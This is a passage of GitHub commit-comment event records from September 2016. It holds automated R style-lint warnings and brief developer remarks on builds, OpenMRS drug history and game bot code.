pool_richness) +\n                                                                    ^~\n```\n[R/generateArtificialData.R:33:74:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                        ~^~\n```\n[R/generateArtificialData.R:33:76:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                           ^\n```\n[R/generateArtificialData.R:33:89:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                                       ~^~\n```\n[R/generateArtificialData.R:34:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_communities){\n^\n```\n[R/generateArtificialData.R:35:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  if(mechanism_random == T){\n^\n```\n[R/generateArtificialData.R:35:47:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                             ~^~\n```\n[R/generateArtificialData.R:35:65:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                                               ~^~~\n```\n[R/generateArtificialData.R:36:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L36) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:36:47:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n                                             ~^\n```\n[R/generateArtificialData.R:37:12:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L37) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_communities){\n           ^\n```\n[R/generateArtificialData.R:38:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }else{\n^\n```\n[R/generateArtificialData.R:38:13:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L38) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  if(mechanism_random == T){\n            ^\n```\n[R/generateArtificialData.R:39:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n^\n```\n[R/generateArtificialData.R:39:29:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L39) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:40:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L40) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- c()\n^\n```\n[R/generateArtificialData.R:41:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(j in 1:n_traits){\n^\n```\n[R/generateArtificialData.R:42:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L42) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      for(k in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:42:24:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                      ~^~~\n```\n[R/generateArtificialData.R:42:48:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                                              ~^~\n```\n[R/generateArtificialData.R:43:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L43) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n^~\n```\n[R/generateArtificialData.R:44:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n^~\n```\n[R/generateArtificialData.R:44:16:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L44) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(j in 1:n_traits){\n               ^\n```\n[R/generateArtificialData.R:45:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      }\n^\n```\n[R/generateArtificialData.R:45:18:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L45) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      for(k in 1:pool_richness){\n                 ^\n```\n[R/generateArtificialData.R:46:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:46:25:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                       ~^~~\n```\n[R/generateArtificialData.R:46:28:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                           ^\n```\n[R/generateArtificialData.R:46:31:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                             ~^~\n```\n[R/generateArtificialData.R:46:36:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                                  ~^\n```\n[R/generateArtificialData.R:47:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n^\n```\n[R/generateArtificialData.R:47:44:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n                                          ~^~~\n```\n[R/generateArtificialData.R:48:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n^\n```\n[R/generateArtificialData.R:49:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    trait_distances_onedimen <- c()\n^\n```\n[R/generateArtificialData.R:50:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(m in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:50:31:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                             ~^~~\n```\n"}},"created_at":"2016-09-18T21:27:41Z"}
{"id":"4580667337","type":"CommitCommentEvent","actor":{"login":"rgaiacs"},"repo":{"name":"scipy-latinamerica/organizers"},"payload":{"comment":{"id":19072321,"position":53,"line":82,"path":"contacts/ambassadors.md","commit_id":"eaef7df38d238513e9f3f8b6787cef11a312a67c","created_at":"2016-09-18T21:28:10Z","updated_at":"2016-09-18T21:28:10Z","body":"This need clarification."}},"created_at":"2016-09-18T21:28:10Z"}
{"id":"4580669706","type":"CommitCommentEvent","actor":{"login":"TheDiamondYT1"},"repo":{"name":"minecrafter/voxelwind"},"payload":{"comment":{"id":19072322,"position":null,"line":null,"path":null,"commit_id":"eeda3a7fa745e5976b331e296f69e8e158662977","created_at":"2016-09-18T21:29:49Z","updated_at":"2016-09-18T21:29:49Z","body":"YEESSS :+1:"}},"created_at":"2016-09-18T21:29:49Z"}
{"id":"4580669832","type":"CommitCommentEvent","actor":{"login":"MelanieCLopez"},"repo":{"name":"Guadalauyians/Melanie-Collette-Lopez"},"payload":{"comment":{"id":19072323,"position":23,"line":23,"path":"LICENSE","commit_id":"adc37c026962561a32a341a9cd3fcf97ff5a1405","created_at":"2016-09-18T21:29:54Z","updated_at":"2016-09-18T21:29:54Z","body":"Melanie Collette Lopez"}},"created_at":"2016-09-18T21:29:54Z"}
{"id":"4580671088","type":"CommitCommentEvent","actor":{"login":"facelesspanda"},"repo":{"name":"facelesspanda/almo"},"payload":{"comment":{"id":19072325,"position":null,"line":null,"path":null,"commit_id":"603c443621199d25584bce2c5d1dbb59f30d3aa3","created_at":"2016-09-18T21:30:39Z","updated_at":"2016-09-18T21:30:39Z","body":"cool, j'y avais pas pensé x)\r\nbien joué le coup du `lbu`"}},"created_at":"2016-09-18T21:30:39Z"}
{"id":"4580671697","type":"CommitCommentEvent","actor":{"login":"MelanieCLopez"},"repo":{"name":"Guadalauyians/Melanie-Collette-Lopez"},"payload":{"comment":{"id":19072326,"position":12,"line":12,"path":"LICENSE","commit_id":"adc37c026962561a32a341a9cd3fcf97ff5a1405","created_at":"2016-09-18T21:31:05Z","updated_at":"2016-09-18T21:31:05Z","body":"Melanie Collette Lopez"}},"created_at":"2016-09-18T21:31:05Z"}
{"id":"4580673001","type":"CommitCommentEvent","actor":{"login":"MelanieCLopez"},"repo":{"name":"Guadalauyians/Melanie-Collette-Lopez"},"payload":{"comment":{"id":19072327,"position":12,"line":12,"path":"LICENSE","commit_id":"adc37c026962561a32a341a9cd3fcf97ff5a1405","created_at":"2016-09-18T21:31:55Z","updated_at":"2016-09-18T21:31:55Z","body":"Melanie Collette Lopez"}},"created_at":"2016-09-18T21:31:55Z"}
{"id":"4580673671","type":"CommitCommentEvent","actor":{"login":"MelanieCLopez"},"repo":{"name":"Guadalauyians/Melanie-Collette-Lopez"},"payload":{"comment":{"id":19072328,"position":23,"line":23,"path":"LICENSE","commit_id":"adc37c026962561a32a341a9cd3fcf97ff5a1405","created_at":"2016-09-18T21:32:20Z","updated_at":"2016-09-18T21:32:20Z","body":"The Book of Life "}},"created_at":"2016-09-18T21:32:20Z"}
{"id":"4580674938","type":"CommitCommentEvent","actor":{"login":"MelanieCLopez"},"repo":{"name":"Guadalauyians/Melanie-Collette-Lopez"},"payload":{"comment":{"id":19072329,"position":181,"line":181,"path":"LICENSE","commit_id":"adc37c026962561a32a341a9cd3fcf97ff5a1405","created_at":"2016-09-18T21:33:13Z","updated_at":"2016-09-18T21:33:13Z","body":"{{Melanie Collette Lopez}}"}},"created_at":"2016-09-18T21:33:13Z"}
{"id":"4580674978","type":"CommitCommentEvent","actor":{"login":"derek-somo"},"repo":{"name":"derek-somo/Practiceeeee"},"payload":{"comment":{"id":19072330,"position":null,"line":null,"path":null,"commit_id":"2eec35becc269bcd3f9d529754417b061fed558c","created_at":"2016-09-18T21:33:14Z","updated_at":"2016-09-18T21:33:14Z","body":"Hmmm"}},"created_at":"2016-09-18T21:33:14Z"}
{"id":"4580675403","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19072331,"position":null,"line":null,"path":null,"commit_id":"d689c11b2dc9f77cc952833cba4edab52d12a79f","created_at":"2016-09-18T21:33:29Z","updated_at":"2016-09-18T21:33:29Z","body":"Also see [Sun Studio 12.2-12.4 and failed debug compile for ossig.h](https://github.com/weidai11/cryptopp/issues/285)."}},"created_at":"2016-09-18T21:33:29Z"}
{"id":"4580675977","type":"CommitCommentEvent","actor":{"login":"MelanieCLopez"},"repo":{"name":"Guadalauyians/Melanie-Collette-Lopez"},"payload":{"comment":{"id":19072332,"position":181,"line":181,"path":"LICENSE","commit_id":"adc37c026962561a32a341a9cd3fcf97ff5a1405","created_at":"2016-09-18T21:33:51Z","updated_at":"2016-09-18T21:33:51Z","body":"{{Copyright name Melanie Lopez}}"}},"created_at":"2016-09-18T21:33:51Z"}
{"id":"4580676045","type":"CommitCommentEvent","actor":{"login":"Guerschon"},"repo":{"name":"IsantePlus/openmrs-module-isantepluspatientdashboard"},"payload":{"comment":{"id":19072333,"position":28,"line":788,"path":"api/src/main/java/org/openmrs/module/isantepluspatientdashboard/api/impl/IsantePlusPatientDashboardServiceImpl.java","commit_id":"bbdf98038645d8c3326da1f0ed5b38630a61b05e","created_at":"2016-09-18T21:33:54Z","updated_at":"2016-09-18T21:33:54Z","body":"It's a request of Nathaelf. He\"d like to make difference between dispense date (in red) and prescription date (in blue) \n\n\nEnvoyé depuis mon smartphone Samsung Galaxy.\n-------- Message d'origine --------De : k-joseph <notifications@github.com> Date : 18/09/2016  1:13 PM  (GMT-05:00) À : IsantePlus/openmrs-module-isantepluspatientdashboard <openmrs-module-isantepluspatientdashboard@noreply.github.com> Cc : Guerschon <francois_guerschon@yahoo.fr>, Mention <mention@noreply.github.com> Objet : Re: [IsantePlus/openmrs-module-isantepluspatientdashboard] Moved in https://github.com/IsantePlus/drugshistory (bbdf980) \nwhy are you using date dispensed observations here?\n\n—\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub, or mute the thread.\n\n\n  \n  \n\n\n\n\n{\"api_version\":\"1.0\",\"publisher\":{\"api_key\":\"05dde50f1d1a384dd78767c55493e4bb\",\"name\":\"GitHub\"},\"entity\":{\"external_key\":\"github/IsantePlus/openmrs-module-isantepluspatientdashboard\",\"title\":\"IsantePlus/openmrs-module-isantepluspatientdashboard\",\"subtitle\":\"GitHub repository\",\"main_image_url\":\"https://cloud.githubusercontent.com/assets/143418/17495839/a5054eac-5d88-11e6-95fc-7290892c7bb5.png\",\"avatar_image_url\":\"https://cloud.githubusercontent.com/assets/143418/15842166/7c72db34-2c0b-11e6-9aed-b52498112777.png\",\"action\":{\"name\":\"Open in GitHub\",\"url\":\"https://github.com/IsantePlus/openmrs-module-isantepluspatientdashboard\"}},\"updates\":{\"snippets\":[{\"icon\":\"PERSON\",\"message\":\"@k-joseph on bbdf980: why are you using date dispensed observations here?\"}],\"action\":{\"name\":\"View Commit\",\"url\":\"https://github.com/IsantePlus/openmrs-module-isantepluspatientdashboard/commit/bbdf98038645d8c3326da1f0ed5b38630a61b05e#commitcomment-19071589\"}}}"}},"created_at":"2016-09-18T21:33:54Z"}
{"id":"4580676558","type":"CommitCommentEvent","actor":{"login":"MelanieCLopez"},"repo":{"name":"Guadalauyians/Melanie-Collette-Lopez"},"payload":{"comment":{"id":19072334,"position":181,"line":181,"path":"LICENSE","commit_id":"adc37c026962561a32a341a9cd3fcf97ff5a1405","created_at":"2016-09-18T21:34:12Z","updated_at":"2016-09-18T21:34:12Z","body":"189"}},"created_at":"2016-09-18T21:34:12Z"}
{"id":"4580677110","type":"CommitCommentEvent","actor":{"login":"Dengill"},"repo":{"name":"Dengill/BuildingEscape01"},"payload":{"comment":{"id":19072335,"position":1,"line":1,"path":"README.md","commit_id":"2b92be1ffaf6db31294b4219c973d8be4443c605","created_at":"2016-09-18T21:34:35Z","updated_at":"2016-09-18T21:34:35Z","body":"My first shit..."}},"created_at":"2016-09-18T21:34:35Z"}
{"id":"4580677495","type":"CommitCommentEvent","actor":{"login":"satya164"},"repo":{"name":"satya164/ex-navigation"},"payload":{"comment":{"id":19072336,"position":24,"line":44,"path":"example/ExNavigationExample/main.js","commit_id":"52944e4deb1214085c3acb8c3853bcbd8758761c","created_at":"2016-09-18T21:34:54Z","updated_at":"2016-09-18T21:34:54Z","body":"I forgot to add an `renderError` method"}},"created_at":"2016-09-18T21:34:54Z"}
{"id":"4580678755","type":"CommitCommentEvent","actor":{"login":"Slayer95"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19072338,"position":null,"line":null,"path":null,"commit_id":"270db5d1c0e116b95de38e2a2c53564399417b40","created_at":"2016-09-18T21:35:48Z","updated_at":"2016-09-18T21:35:48Z","body":"Yes, @panpawn. Unless you want to implement ``/hotpatch verifier``\r\n\r\n(I am actually not sure if we want to be able to hotpatch it)."}},"created_at":"2016-09-18T21:35:48Z"}
{"id":"4580678971","type":"CommitCommentEvent","actor":{"login":"Kotys"},"repo":{"name":"KotysLAB/LaserArena"},"payload":{"comment":{"id":19072339,"position":null,"line":null,"path":null,"commit_id":"275a33d7ae8a91748c944cf53185b7f080bea8bf","created_at":"2016-09-18T21:35:56Z","updated_at":"2016-09-18T21:35:56Z","body":"Cool"}},"created_at":"2016-09-18T21:35:56Z"}
{"id":"4580680005","type":"CommitCommentEvent","actor":{"login":"Guerschon"},"repo":{"name":"IsantePlus/openmrs-module-isantepluspatientdashboard"},"payload":{"comment":{"id":19072340,"position":null,"line":null,"path":null,"commit_id":"bbdf98038645d8c3326da1f0ed5b38630a61b05e","created_at":"2016-09-18T21:36:39Z","updated_at":"2016-09-18T21:36:39Z","body":"We use our own forms to prescribe drugs. Do you think that the drug order api should work if we don't use openmrs drug order module but our forms?\n\n\nEnvoyé depuis mon smartphone Samsung Galaxy.\n-------- Message d'origine --------De : k-joseph <notifications@github.com> Date : 18/09/2016  1:15 PM  (GMT-05:00) À : IsantePlus/openmrs-module-isantepluspatientdashboard <openmrs-module-isantepluspatientdashboard@noreply.github.com> Cc : Guerschon <francois_guerschon@yahoo.fr>, Mention <mention@noreply.github.com> Objet : Re: [IsantePlus/openmrs-module-isantepluspatientdashboard] Moved in https://github.com/IsantePlus/drugshistory (bbdf980) \nDrugs in OpenMRS are managed through a separate api; Drug Order API rewritten from 1.10.0, you need to use the same api through this method and rewrite this i think to retrieve drug history through drug orders, in this case drug history would be ordered drug history\n\n—\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub, or mute the thread.\n\n\n  \n  \n\n\n\n\n{\"api_version\":\"1.0\",\"publisher\":{\"api_key\":\"05dde50f1d1a384dd78767c55493e4bb\",\"name\":\"GitHub\"},\"entity\":{\"external_key\":\"github/IsantePlus/openmrs-module-isantepluspatientdashboard\",\"title\":\"IsantePlus/openmrs-module-isantepluspatientdashboard\",\"subtitle\":\"GitHub repository\",\"main_image_url\":\"https://cloud.githubusercontent.com/assets/143418/17495839/a5054eac-5d88-11e6-95fc-7290892c7bb5.png\",\"avatar_image_url\":\"https://cloud.githubusercontent.com/assets/143418/15842166/7c72db34-2c0b-11e6-9aed-b52498112777.png\",\"action\":{\"name\":\"Open in GitHub\",\"url\":\"https://github.com/IsantePlus/openmrs-module-isantepluspatientdashboard\"}},\"updates\":{\"snippets\":[{\"icon\":\"PERSON\",\"message\":\"@k-joseph on bbdf980: Drugs in OpenMRS are managed through a separate api; Drug Order API rewritten from 1.10.0, you need to use the same api through this method and rewrite this i think to retrieve drug history through drug orders, in this case drug history would be ordered drug history\"}],\"action\":{\"name\":\"View Commit\",\"url\":\"https://github.com/IsantePlus/openmrs-module-isantepluspatientdashboard/commit/bbdf98038645d8c3326da1f0ed5b38630a61b05e#commitcomment-19071603\"}}}"}},"created_at":"2016-09-18T21:36:39Z"}
{"id":"4580680345","type":"CommitCommentEvent","actor":{"login":"jvasileff"},"repo":{"name":"ceylon/ceylon"},"payload":{"comment":{"id":19072341,"position":null,"line":null,"path":null,"commit_id":"6cf8aa6d15de6588666d24973f7e288aadf046a5","created_at":"2016-09-18T21:36:55Z","updated_at":"2016-09-18T21:36:55Z","body":"Awesome, thanks!"}},"created_at":"2016-09-18T21:36:55Z"}
{"id":"4580682253","type":"CommitCommentEvent","actor":{"login":"hansemannn"},"repo":{"name":"hansemannn/titanium_mobile"},"payload":{"comment":{"id":19072343,"position":56,"line":1911,"path":"iphone/cli/commands/_build.js","commit_id":"ed273953fec2fdfa36bfbe9431d0c9600d50a3a6","created_at":"2016-09-18T21:38:10Z","updated_at":"2016-09-18T21:38:10Z","body":"Talking about the team-id, can't we get it from the provisioning-profile without specifying it manually? Using the `TeamIdentifier` key."}},"created_at":"2016-09-18T21:38:10Z"}
{"id":"4580685222","type":"CommitCommentEvent","actor":{"login":"jeeb"},"repo":{"name":"mpv-android/mpv-android"},"payload":{"comment":{"id":19072348,"position":null,"line":null,"path":null,"commit_id":"ddd3f7282976c754eb6f813506d69b49cb7696d5","created_at":"2016-09-18T21:40:11Z","updated_at":"2016-09-18T21:40:11Z","body":"One can still build with the old toolchain and ARMv7 only with\r\n`PREFIX=/your/armv7_prefix/ NDK_TOOLCHAIN_VERSION=4.9 ndk-build -C app/src/main APP_ABI=\"armeabi-v7a\" APP_PLATFORM=\"android-19\"`"}},"created_at":"2016-09-18T21:40:11Z"}
{"id":"4580685609","type":"CommitCommentEvent","actor":{"login":"Andreasjuette"},"repo":{"name":"Andreasjuette/Swift"},"payload":{"comment":{"id":19072349,"position":null,"line":null,"path":null,"commit_id":"80111b70094ea331a687101243c44b3cfef34f13","created_at":"2016-09-18T21:40:26Z","updated_at":"2016-09-18T21:40:26Z","body":"Swift"}},"created_at":"2016-09-18T21:40:26Z"}
{"id":"4580686681","type":"CommitCommentEvent","actor":{"login":"joycechendev"},"repo":{"name":"joycechendev/Invasion-of-Chair"},"payload":{"comment":{"id":19072352,"position":102,"line":118,"path":"assets/js/game.js","commit_id":"05cce1cc8ad323bf455b87ac2741fcb5f3238ff8","created_at":"2016-09-18T21:41:09Z","updated_at":"2016-09-18T21:41:09Z","body":"My bad... added all the new lines to move to center of the screen. Removing them next time"}},"created_at":"2016-09-18T21:41:09Z"}
{"id":"4580687474","type":"CommitCommentEvent","actor":{"login":"mckamey"},"repo":{"name":"jsonfx/jsonfx"},"payload":{"comment":{"id":19072353,"position":null,"line":null,"path":null,"commit_id":"b4f351deefeb03ca32a987f07a99960a239d245f","created_at":"2016-09-18T21:41:41Z","updated_at":"2016-09-18T21:41:41Z","body":"Try wrapping this change in a conditional compilation block:\r\n\r\n```C#\r\n#if NET20 || NET30 || NET35\r\n....\r\n#endif\r\n```\r\n\r\nIf that works for you, send me a PR and I'll merge it in."}},"created_at":"2016-09-18T21:41:41Z"}
{"id":"4580688933","type":"CommitCommentEvent","actor":{"login":"bin4rym4ge"},"repo":{"name":"bin4rym4ge/simple-vector-math"},"payload":{"comment":{"id":19072355,"position":null,"line":null,"path":null,"commit_id":"0a62f0367646e8f5d05e41d9ca323af0d11419f1","created_at":"2016-09-18T21:42:41Z","updated_at":"2016-09-18T21:42:41Z","body":"just a test of Vector functions."}},"created_at":"2016-09-18T21:42:41Z"}
{"id":"4580693173","type":"CommitCommentEvent","actor":{"login":"scienceisfiction"},"repo":{"name":"derek-somo/Practiceeeee"},"payload":{"comment":{"id":19072359,"position":null,"line":null,"path":null,"commit_id":"2eec35becc269bcd3f9d529754417b061fed558c","created_at":"2016-09-18T21:45:40Z","updated_at":"2016-09-18T21:45:40Z","body":"Hiii!\r\n\r\nAdd this to your readme and push to GitHub so I can see! I'll watch your repo (since it is public, mwahahaha) and be happy when you do!\r\n\r\n```\r\nlibrary(tibble)\r\nlibrary(\"gapminder\")\r\ngapminder\r\n```\r\n:kiss:"}},"created_at":"2016-09-18T21:45:40Z"}
{"id":"4580693339","type":"CommitCommentEvent","actor":{"login":"Omega094"},"repo":{"name":"nirvananoob/leetcode"},"payload":{"comment":{"id":19072360,"position":29,"line":29,"path":"python/meeting_room_ii.py","commit_id":"12b5684c9f26825a4e844c559e0241db5268946b","created_at":"2016-09-18T21:45:48Z","updated_at":"2016-09-18T21:45:48Z","body":"原来是问这个。。。\r\n显然有更简单的写法。。。\r\nhttps://github.com/Omega094/leetcode/blob/master/meeting_rooms_ii/MeetingRooms.py#L18\r\n强无敌。 \r\n@puchai"}},"created_at":"2016-09-18T21:45:48Z"}
{"id":"4580694578","type":"CommitCommentEvent","actor":{"login":"DamasClasicas"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19072361,"position":null,"line":null,"path":null,"commit_id":"066447c24f4339ab37566a1cbbde2a390f16a94e","created_at":"2016-09-18T21:46:38Z","updated_at":"2016-09-18T21:46:38Z","body":"Very nice! Congratulations!!"}},"created_at":"2016-09-18T21:46:38Z"}
{"id":"4580697257","type":"CommitCommentEvent","actor":{"login":"Slayer95"},"repo":{"name":"Zarel/Pokemon-Showdown-Client"},"payload":{"comment":{"id":19072365,"position":null,"line":null,"path":null,"commit_id":"05914194c65b8acdf6cda250d2facc075e331f3a","created_at":"2016-09-18T21:48:34Z","updated_at":"2016-09-18T21:48:34Z","body":"Oh, I see I misunderstood what this did"}},"created_at":"2016-09-18T21:48:34Z"}
{"id":"4580698552","type":"CommitCommentEvent","actor":{"login":"cb1kenobi"},"repo":{"name":"hansemannn/titanium_mobile"},"payload":{"comment":{"id":19072367,"position":56,"line":1911,"path":"iphone/cli/commands/_build.js","commit_id":"ed273953fec2fdfa36bfbe9431d0c9600d50a3a6","created_at":"2016-09-18T21:49:31Z","updated_at":"2016-09-18T21:49:31Z","body":"We scavenge the team ids from the provisioning profiles. I don't see why we can't use the team id from the provisioning profile in watch apps."}},"created_at":"2016-09-18T21:49:31Z"}
{"id":"4580699001","type":"CommitCommentEvent","actor":{"login":"DontNuts"},"repo":{"name":"mo0ojava/NecroBot-1"},"payload":{"comment":{"id":19072370,"position":267,"line":412,"path":"PoGo.NecroBot.Logic/Tasks/CatchPokemonTask.cs","commit_id":"29559ef15525a6d6ad7d3abf7aa80ae88d5dd903","created_at":"2016-09-18T21:49:49Z","updated_at":"2016-09-18T21:49:49Z","body":"As hinted by the code from ConsoleEventListener.cs, the evt.Perfection value will be displayed with 2 decimal points, I think it should be rounded to 2 decimal points too... (but hey, it seems it doesn't even needed to be round at all because it will be displayed as 2 decimal points, anyway)\r\n\r\n\r\n \r\n204             if (pokemonCaptureEvent.Status == CatchPokemonResponse.Types.CatchStatus.CatchSuccess) \r\n205             { \r\n206                 message = session.Translation.GetTranslation(TranslationString.EventPokemonCaptureSuccess, catchStatus, catchType, session.Translation.GetPokemonTranslation(pokemonCaptureEvent.Id), \r\n207                 pokemonCaptureEvent.Level, pokemonCaptureEvent.Cp, pokemonCaptureEvent.MaxCp, pokemonCaptureEvent.Perfection.ToString(\"0.00\"), pokemonCaptureEvent.Probability, \r\n208                 pokemonCaptureEvent.Distance.ToString(\"F2\"), \r\n209                 returnRealBallName(pokemonCaptureEvent.Pokeball), pokemonCaptureEvent.BallAmount, \r\n210                 pokemonCaptureEvent.Exp, familyCandies, pokemonCaptureEvent.Latitude.ToString(\"0.000000\"), pokemonCaptureEvent.Longitude.ToString(\"0.000000\"), \r\n211                 pokemonCaptureEvent.Move1, pokemonCaptureEvent.Move2  , pokemonCaptureEvent.Rarity \r\n212                ); \r\n"}},"created_at":"2016-09-18T21:49:49Z"}
